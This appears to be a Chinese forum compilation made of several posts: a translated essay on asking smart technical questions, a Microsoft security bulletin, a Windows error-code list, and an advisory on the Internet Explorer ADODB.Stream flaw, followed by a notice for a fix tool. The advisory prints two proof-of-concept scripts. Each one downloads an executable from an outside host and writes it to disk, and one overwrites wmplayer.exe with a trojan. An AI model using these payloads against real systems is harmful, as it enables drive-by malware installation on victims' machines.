技术总汇

TL

当提出一个问题时，你怎样能得到准确的回答？这取决于您提出问题的难度，同样取决于
你提问的方法。


提问之前(Before You Ask)


在通过电邮、新闻组或者聊天室提出技术问题前，检查你有没有做到：

1. 通读手册，试着自己找答案。

2. 在FAQ里找答案（一份维护得好的FAQ可以包罗万象:）。

3. 在网上搜索（个人推荐google~~~）。

4. 向你身边精于此道的朋友打听。


当你提出问题的时候，首先要说明在此之前你干了些什么。
周全的思考，准备好你的问题，草率的发问只能得到草率的回答，或者根本得不到任何答
案。越表现出在寻求帮助前为解决问题付出的努力，你越能得到实质性的帮助。


怎样提问 (When You Ask)


谨慎选择不同的分组：


小心选择提问的场合。如果象下面描述的那样，你很可能被忽略掉或者被看作失败者：


1. 在风马牛不相及的论坛贴出你的问题

2. 在探讨高级技巧的论坛张贴非常初级的问题；反之亦然

3. 在太多的不同新闻组交叉张贴


用辞贴切，语法正确，拼写无误


我们从经验中发现，粗心的写作者可能也是马虎的思考者。

回答粗心大意者的问题很不值得。

正确的拼写，标点符号和大小写很重要。


更一般的说，如果你的提问写得象个半文盲，你很有可能被忽视。


如果你在使用非母语的论坛提问，你可以犯点拼写和语法上的小错--但决不能在思考上马
虎（没错，我们能弄清两者的分别）


使用含义丰富，描述准确的标题


在邮件列表或者新闻组中，大约50字以内的主题标题是抓住资深专家注意力的黄金时机。
别用喋喋不休的“帮帮忙”（更别说“救命啊！！！！！”这样让人反感的话）来浪费这
个机会。不要妄想用你的痛 苦程度来打动我们，别用空格代替问题的描述，哪怕是极其简
短的描述。


不够聪明的问题：


救命啊！我的膝上机不能正常显示了！


聪明问题：


XFree86 4.1下鼠标光标变形，Fooware MV1005的显示芯片。


如果你在回复中提出问题，记得要修改内容标题，表明里面有一个问题。一个看起来象“
Re：测试”或者“Re：新bug”的问题很难引起足够重视。另外，引用并删减前文的内容，
给新来的读者留下线索。


精确描述，信息量大


1. 谨慎明确的描述症状。

2. 提供问题发生的环境（机器配置、操作系统、应用程序以及别的什么）。

3. 说明你在提问前是怎样去研究和理解这个问题的。

4. 说明你在提问前采取了什么步骤去解决它。

5. 罗列最近做过什么可能有影响的硬件、软件变更。


话不在多


你需要提供精确有效的信息。这并不是要求你简单的把成吨的出错代码或者数据完全转储
摘录到你的提问中。如果你有庞大而复杂的测试条件，尽量把它剪裁得越小越好。


这样做的用处至少有三点。第一，表现出你为简化问题付出了努力，这可以使你得到回答
的机会增加；第二，简化问题使你得到有用答案的机会增加；第三，在提炼你的bug报告的
过程中，也许你自己就能找出问题所在或作出更正。


只说症状，不说猜想


告诉大家你认为问题是怎样引起的没什么帮助。（如果你的推断如此有效，还用向别人求
助吗？），因此要确信你原原本本告诉了他们问题的症状，不要加进你自己的理解和推论
。


不够聪明的问题：


我在内核编译中一次又一次遇到SIG11错误，我怀疑某条飞线搭在主板的走线上了，这种情
况应该怎样检查最好？


聪明问题：


我自制的一套K6/233系统，主板是FIC-PA2007 （VIA Apollo VP2芯片组），256MB Corsa
ir PC133 SDRAM，在内核编译中频频产生SIG11错误，从开机20分钟以后就有这种情况，开
机前20分钟内从没发生过。重启也没有用，但是关机一晚上就又能工作20分钟。所有内存
都换过了，没有效果。相关部分的典型编译记录如下...。


按时间顺序列出症状


对找出问题最有帮助的线索，往往就是问题发生前的一系列操作，因此，你的说明应该包
含操作步骤，以及电脑的反应，直到问题产生。如果你的说明很长（超过四个段落），在
开头简述问题会有所帮助，接下来按时间顺序详述。


明白你想问什么


漫无边际的提问近乎无休无止的时间黑洞。最能给你有用答案的人也正是最忙的人（他们
忙是因为要亲自完成大部分工作）。这样的人对无节制的时间黑洞不太感冒，因此也可以
说他们对漫无边际的提问不大感冒。 如果你明确表述需要回答者做什么（提供建议，发送
一段代码，检查你的补丁或是别的），就最有可能得到有用的答案。这会定出一个时间和
精力的上限，便于回答者集中精力来帮你，这很凑效。


优化问题的结构，尽量减少专家们解决它所需要的时间，会有很大的帮助--这通常和简化
问题有所区别。因此，问“我想更好的理解X，能给点提示吗？”通常比问“你能解释一下
X吗？”更好。如果你的代码不能工作，问问它有什么地方不对，比要求别人替你修改要明
智得多。


别问应该自己解决的问题


大家总是善于分辨哪些问题应该由你自己解决；因为我们中的大多数都曾自己解决这类问
题。同样，这些问题得由你来搞定，你会从中学到东西。你可以要求给点提示，但别要求
得到完整的解决方案。


去除无意义的疑问


别用无意义的话结束提问，例如“有人能帮我吗？”或者“有答案吗？”。


首先：如果你对问题的描述不很合适，这样问更是画蛇添足。

谦逊绝没有害处，而且常帮大忙


彬彬有礼，多用“请”和“先道个谢了”。让大家都知道你对他们花费时间义务提供帮助
心存感激。 然而，如果你有很多问题无法解决，礼貌将会增加你得到有用答案的机会。


问题解决后，加个简短说明


问题解决后，向所有帮助过你的人发个说明，让他们知道问题是怎样解决的，并再一次向
他们表示感谢。如果问题在新闻组或者邮件列表中引起了广泛关注，应该在那里贴一个补
充说明。补充说明不必很长或是很深入；简单的一句“你好，原来是网线出了问题！谢谢
大家--Bill”比什么也不说要强。事实上，除非结论真的很有技术含量，否则简短可爱的
小结比长篇学术论文更好。说明 问题是怎样解决的，但大可不必将解决问题的过程复述一
遍。


除了表示礼貌和反馈信息以外，这种补充有助于他人在邮件列表/新闻组/论坛中搜索对你
有过帮助的完整解决方案，这可能对他们也很有用。


最后（至少？），这种补充有助于所有提供过帮助的人从中得到满足感。如果你自己不是
老手或者黑客，那就相信我们，这种感觉对于那些你向他们求助的导师或者专家而言，是
非常重要的。问题久拖未决会让人灰心；黑客们渴望看到问题被解决。好人有好报，满足
他们的渴望，你会在下次贴出新问题时尝到甜头。


还是不懂


如果你不是很理解答案，别立刻要求对方解释。象你以前试着自己解决问题时那样（利用
手册，FAQ，网络，身边的高手），去理解它。 如果你真的需要对方解释，记得表现出你
已经学到了点什么。比方说，如果我回答你：“看来似乎是zEntry被阻塞了；你应该先清
除它。”，然后：一个很糟的后续问题：“zEntry是什么？” 聪明的问法应该是这样：“
哦~~~我看过帮助了但是只有-z和-p两个参数中提到了zEntry而且还都没有清楚的解释:<你
是指这两个中的哪一个吗？还是我看漏了什么？”


三思而后问 ( Questions Not To Ask)


以下是几个经典不聪明的问题，以及大家在拒绝回答时的心中所想：


问题：我能在哪找到X程序？

回答：就在我找到它的地方啊--搜索引擎的那一头。天呐！还有人不会用Google吗？


提问：我的程序（配置、SQL申明）没有用


回答：这不算是问题吧，我对找出你的真正问题没兴趣--如果要我问你二十个问题才找得
出来的话--我有更有意思的事要做呢。


在看到这类问题的时候，我的反应通常不外如下2种：


1. 你还有什么要补充的吗？

2. 真糟糕，希望你能搞定。



好问题，坏问题 ( Good and Bad Questions )


最后，我举一些例子来说明，怎样聪明的提问；同一个问题的两种问法被放在一起，一种
是愚蠢的，另一种才是明智的。


不聪明问题：我可以在哪儿找到关于Foonly Flurbamatic的资料？


这种问法无非想得到“STFW”这样的回答。


聪明问题：我用Google搜索过“Foonly Flurbamatic 2600”，但 是没找到有用的结果。
谁知道上哪儿去找对这种设备编程的资料？


这个问题已经STFW过了，看起来他真的遇到了麻烦。


不够聪明的问题：我从FOO项目找来的源码没法编译。它怎么这么烂？


他觉得都是别人的错


聪明问题：FOO项目代码在Nulix 6.2版下无法编译通过。我读过了FAQ，但里面没有提到跟
Nulix有关的问题。这是我编译过程的记录，我有什么做得不对的地方吗？


他讲明了环境，也读过了FAQ，还指明了错误，并且他没有把问题的责任推到别人头上，这
个家伙值得留意。


不聪明问题：我的主板有问题了，谁来帮我？



聪明问题：我在S2464主板上试过了X、Y和Z，但没什么作用，我又试了A、B和C。请注意当
我尝试C时的奇怪现象。显然边带传输中出现了收缩，但结果出人意料。在多处理器主板上
引起边带泄漏的通常原因是什么？谁有好主意接下来我该做些什么测试才能找出问题？


这个家伙，从另一个角度来看，值得去回答他。他表现出了解决问题的能力，而不是坐等
天上掉答案。在最后一个问题中，注意“告诉我答案”和“给我启示，指出我还应该做什
么诊断工作”之间微妙而又重要的区别。


事实上，后一个问题源自于2001年8月在Linux内核邮件列表上的一个真实的提问。我（Er
ic）就是那个提出问题的人。我在Tyan S2464主板上观察到了这种无法解释的锁定现象，
列表成员们提供了解决那一问题的重要信息。


通过我的提问方法，我给了大家值得玩味的东西；我让人们很容易参与并且被吸引进来。
我显示了自己具备和他们同等的能力，邀请他们与我共同探讨。我告诉他们我所走过的弯
路，以避免他们再浪费时间，这是一种对他人时间价值的尊重。后来，当我向每个人表示
感谢，并且赞赏这套程序（指邮件列表中的讨论--译者注）运作得非常出色的时候，一个
Linux内核邮件列表（lkml）成员表示，问题得到解决并非由于我是这个列表中的“名人”
，而是因为我用了正确的方式来提问。


找不到答案怎么办 (If You Can't Get An Answer)


如果仍得不到答案，请不要以为我们觉得无法帮助你。有时只是看到你问题的人不知道答
案罢了。没有回应不代表你被忽视，虽然不可否认这种差别很难区分。


总的说来，简单的重复张贴问题是个很糟的想法。这将被视为无意义的喧闹。


你可以通过其它渠道获得帮助，这些渠道通常更适合初学者的需要。有许多网上的以及本
地的用户组，由狂热的软件爱好者（即使他们可能从没亲自写过任何软件）组成。通常人
们组建这样的团体来互相帮助并帮助新手。

白马探

发布日期：2004年05月11日
更新日期：2004年05月11日
版本号：1.1

摘要：

本公告的目标读者：使用Microsoft&reg; Windows&reg;的客户

漏洞的影响：执行远程代码

最高严重等级：重要

建议：客户应该尽早安装安全更新。

修补程序替换信息：无

注意事项：一个众所周知的问题是：用户在帮助和支持中心服务失灵的系统上，安装这一安全更新，可能会碰到一些问题，Microsoft Knowledge Base Article 841996 对可能出现的问题进行了描述。要保证这一安全更新成功，就必须确保帮助和支持中心服务运行正常。Microsoft Knowledge Base Article 841996也对这些可能出现的问题提出了解决方案。更多信息，请看Microsoft Knowledge Base Article 841996。

经过测试的软件和修补程序下载位置

受影响软件：
&#8226; Microsoft Windows XP and Microsoft Windows XP Service Pack 1 –  http://www.microsoft.com/downloa ... &displaylang=en
&#8226; Microsoft Windows XP 64-Bit Edition Service Pack 1 – http://www.microsoft.com/downloa ... &displaylang=en

&#8226; Microsoft Windows XP 64-Bit Edition Version 2003 –http://www.microsoft.com/downloa ... &displaylang=en[/URL]

&#8226; Microsoft Windows Server&#8482; 2003 – http://www.microsoft.com/downloa ... &displaylang=en

&#8226; Microsoft Windows Server 2003 64-Bit Edition – http://www.microsoft.com/downloa ... &displaylang=en

（以上链接均连到第三方网站）

不受影响的系统：

&#8226; Microsoft Windows NT&reg; Workstation 4.0 Service Pack 6a

&#8226; Microsoft Windows NT Server 4.0 Service Pack 6a

&#8226; Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6

&#8226; Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service Pack 3, Microsoft Windows 2000 Service Pack 4

&#8226; Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)


上面列出的软件已经过测试，以确定上述版本是否会受到影响。其他版本已不再受支持，它们可能会也可能不会受到影响。

技术说明：

此更新解决了一个新发现的漏洞，"帮助和支持中心"存在远程代码执行漏洞，通过操纵HCP VRL 确认的方法。在这个公告里此漏洞记录在漏洞细节部分。

如果一个用户以管理权限登录，攻击者利用此漏洞可以完全控制受此漏洞影响的系统，包括安装程序、查看、修改、删除数据；或者建立拥有所有权限的新帐号。拥有较少权限的用户比那些拥有管理权限的用户相对危险小。

微软建议用户尽快安全安全更新。

严重等级与漏洞影响：

漏洞标识 漏洞效果 Windows XP Windows Server 2003
帮助和支持中心漏洞- CAN-2004-0199
远程代码执行
重要
重要

Aggregate Severity of All Vulnerabilities
   重要
重要


修订版本：

&#8226; V1.0 (2004年05月11日):公告创建

&#8226; V1.1 (2004年05月11日): 公告更新

编译：wangyandi

工藤世家

使用Windows出现蓝色屏幕是经常的事，而且每每因为不清楚错误的来源而频繁重新安装系统，劳神费时。下列收集了一些Windows死机密码，供大家参考。

0x0000 操作完成
0x0001 不正确的函数
0x0002 系统找不到指定的文件
0x0003 系统找不到指定的路径
0x0004 系统无法打开文件
0x0005 拒绝存取
0x0006 无效的代码
0x0007 内存控制模块已损坏
0x0008 内存空间不足，无法处理这个指令
0x0009 内存控制模块地址无效
0x000a 环境不正确
0x000b 尝试载入一个格式错误的程序
0x000c 存取码错误
0x000d 资料错误
0x000e 内存空间不够，无法完成这项操作
0x000f 系统找不到制定的硬盘
0x0010 无法移除目录
0x0011 系统无法将文件移到其他的硬盘
0x0012 没有任何文件
0x0019 找不到指定的扇区或磁道
0x001a 指定的磁盘或磁片无法存取
0x001b 磁盘找不到要求的扇区
0x001c 打印机没有纸
0x001d 系统无法将资料写入制定的磁盘
0x001e 系统无法读取指定的装置
0x001f 连接到系统的某个装置没有作用
0x0021 文件的一部分被锁定
0x0024 开启的分享文件数量太多
0x0026 到达文件结尾
0x0027 磁盘已满
0x0036 网络繁忙
0x003b 网络发生意外的错误
0x0043 网络名称找不到
0x0050 文件已经存在
0x0052 无法建立目录或文件
0x0053 int24失败
0x006b 因为代用的磁盘尚未插入，所以程序已经停止
0x006c 磁盘正在使用中或被锁定
0x006f 文件名太长
0x0070 硬盘空间不足
0x007f 找不到指定的程序
0x045b 系统正在关机
0x045c 无法种植系统关机，因为没有关机的动作在进行中
0x046a 可用服务器储存空间不足，无法处理这项指令
0x047e 指定的程序需要新的Windows版本
0x047f 指定的程序不是Windows或MS-DOS程序
0x0480 指定的程序已经启动，无法再启动一次
0x0481 指定的程序是为旧版的Windows所写的
0x0482 执行此应用程序所需的程序库文件之一毁坏
0x0483 没有应用程序与此项操作的指定文件建立关联
0x0484 传送指令到应用程序发生错误
0x04b0 指定的装置名称无效
0x05a2 窗口不是子窗口
0x05aa 系统资源不足，无法完成所要求的服务
0x05ab 系统子还不足，无法完成所需要的服务
0x05ac 系统资源不足，无法完成所要求的服务
0x06b9 资源不足，无法完成操作

xiangtian

涉及程序：
Microsoft Internet Explorer ADODB.Stream
  
描述：
Microsoft Internet Explorer ADODB.Stream对象文件安装漏洞
  
详细：
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer ADODB.Stream对象实现存在问题，远程攻击者可以利用这个漏洞在目标用户系统上安装恶意文件。

问题是脚本可利用ADODB.Stream对象写或覆盖攻击者指定的文件到目标文件系统中，以这种方式，攻击者构建的恶意页面，当用户浏览器时，可使HTML文档利用ADODB.Stream对象在磁盘上安装文件。

要利用这个漏洞一般需要其他漏洞结合，如重定向浏览器到本地安全区域，然后使恶意文件在此上下文执行，写文件到系统上。也需要其他攻击因素的存在，如引诱用户下载HTML文档并使用浏览器打开，也可以利用HTML形式的EMAIL来触发。

受影响系统：
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
   - Microsoft Windows XP Professional
   - Microsoft Windows XP Home
   - Microsoft Windows NT 4.0 SP6a
   - Microsoft Windows ME
   - Microsoft Windows 98 SE
   - Microsoft Windows 98
   - Microsoft Windows 2003 Web Edition
   - Microsoft Windows 2003 Standard Edition
   - Microsoft Windows 2003 Enterprise Edition 64-bit
   - Microsoft Windows 2003 Enterprise Edition
   - Microsoft Windows 2003 Datacenter Edition 64-bit
   - Microsoft Windows 2003 Datacenter Edition
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server

  
攻击方法：
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

jelmer （[email protected]）提供了如下测试方法：

<script language="vbscript">

const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3

set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",
false
xmlHTTP.send
contents = xmlHTTP.responseBody

Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open

oStr.Write(contents)
oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite

</script>


以下是Jelmer演示的覆盖wmplayer.exe:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://attacker/trojan.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
解决方案：
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

DT·conan

瑞星2004年06月17日发布ADODB.Stream漏洞防范工具

版 本 号：1.0
软件大小：111 KB
应用平台：Windows平台

下载地址：http://download.rising.com.cn/zsgj/Fix_ADODB.Stream.exe

工具说明：
1.Windows2000/xp系统中默认安装的ADODB.Stream组件可能会被恶意攻击者利用，本软件可以将之移除，防止木马病毒利用该组件危害系统的安全。

2.如果微软发布了针对此漏洞的补丁，用户可利用此软件恢复被移除的组件后再安装微软补丁。